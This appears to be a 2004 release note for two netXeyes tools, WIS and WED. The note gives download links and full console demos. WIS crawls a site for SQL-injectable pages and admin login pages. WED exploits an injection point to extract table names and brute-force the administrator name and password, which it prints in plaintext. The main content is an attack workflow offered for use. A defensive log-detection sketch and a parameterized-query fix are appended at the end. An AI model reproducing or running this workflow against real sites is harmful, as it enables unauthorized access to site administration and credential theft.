Source: netxeyes
http://www.netxeyes.com/wis.rar
http://www.netxeyes.com/wed.rar
[WED] 2004/08/29
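WED (Web Entry Detector) scans for administrator account credentials on websites that are vulnerable to SQL injection.
Demo: scan for the back-end administrator account on a website that a WIS scan has found to be vulnerable to SQL injection
C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544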
Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com
#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened
#### Phrase 1: Process Argv ####
Host: www.someaspsite.com
Page:/shownews.asp?newsid=1544
#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.
#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/
#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"
#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"
#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13
#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"
#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9
#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####
name is: administrator
pwd is: admin@bvn
C:\>
At this point, it is possible to log in to the back end through the administration page found by the WIS scan.
[WIS] 2004/08/29
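WIS (Web Injection Scanner) automatically scans an entire website for SQL injection vulnerabilities and can also scan for back-end login pages.
Demo1: scan the entire website and find the pages vulnerable to SQL injection
C:\>wis http://www.someaspsite.com/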
Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08
http://www.netXeyes.com security@vip.sina.com
Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....
(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204
Injection Page Final Result:
============================
/shownews.asp?newsid=204
C:\>
Demo2: scan for back-end administration pages
C:\>wis http://www.someaspsite.com/ /A
Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08
http://www.netXeyes.com security@vip.sina.com
Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....
(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp
Access Page Final Result:
============================
/gansu2/login.asp (200 OK)
Scan Finished
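
Both demos leave a footprint in web server logs that a defender can look for: a parameter such as newsid, numeric in normal use, arriving with non-numeric content, and one client requesting many administration-style .asp pages that do not exist. The sketch below is an added example, not part of the original release notes or of the tools; the log records are constructed, and the parameter set, path pattern and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Assumptions (not from the page): which parameters must be integers, what an
# administration-style page name looks like, and how many misses are suspicious.
NUMERIC_PARAMS = {"newsid"}
ADMIN_HINT = re.compile(r"(admin|manage|login|stats)[^/]*\.asp$", re.I)
PROBE_THRESHOLD = 3

# Constructed sample records (client, request target, HTTP status); not real traffic.
SAMPLE_LOG = [
    ("192.0.2.10", "/shownews.asp?newsid=1544", 200),
    ("192.0.2.10", "/login.asp", 200),
    ("198.51.100.7", "/shownews.asp?newsid=1544%27", 500),
    ("198.51.100.7", "/shownews.asp?newsid=1544%20and%20true", 200),
    ("198.51.100.7", "/admin.asp", 404),
    ("198.51.100.7", "/admin_index.asp", 404),
    ("198.51.100.7", "/manage.asp", 404),
    ("198.51.100.7", "/wwwstats.asp", 404),
    ("198.51.100.7", "/login.asp", 200),
]

def non_numeric_ids(records):
    """Return (client, target) pairs where an integer parameter is not all digits."""
    hits = []
    for client, target, _status in records:
        query = urlsplit(target).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                hits.append((client, target))
    return hits

def admin_page_probers(records):
    """Return clients with >= PROBE_THRESHOLD distinct admin-style pages answered 404."""
    misses = defaultdict(set)
    for client, target, status in records:
        path = urlsplit(target).path.lower()
        if status == 404 and ADMIN_HINT.search(path):
            misses[client].add(path)
    return sorted(c for c, paths in misses.items() if len(paths) >= PROBE_THRESHOLD)

if __name__ == "__main__":
    for client, target in non_numeric_ids(SAMPLE_LOG):
        print("non-numeric id:", client, target)
    print("admin-page probing:", admin_page_probers(SAMPLE_LOG))
```

Detection only narrows the window; the durable fix is in the application, by validating newsid as an integer and passing it to the database through a parameterized query.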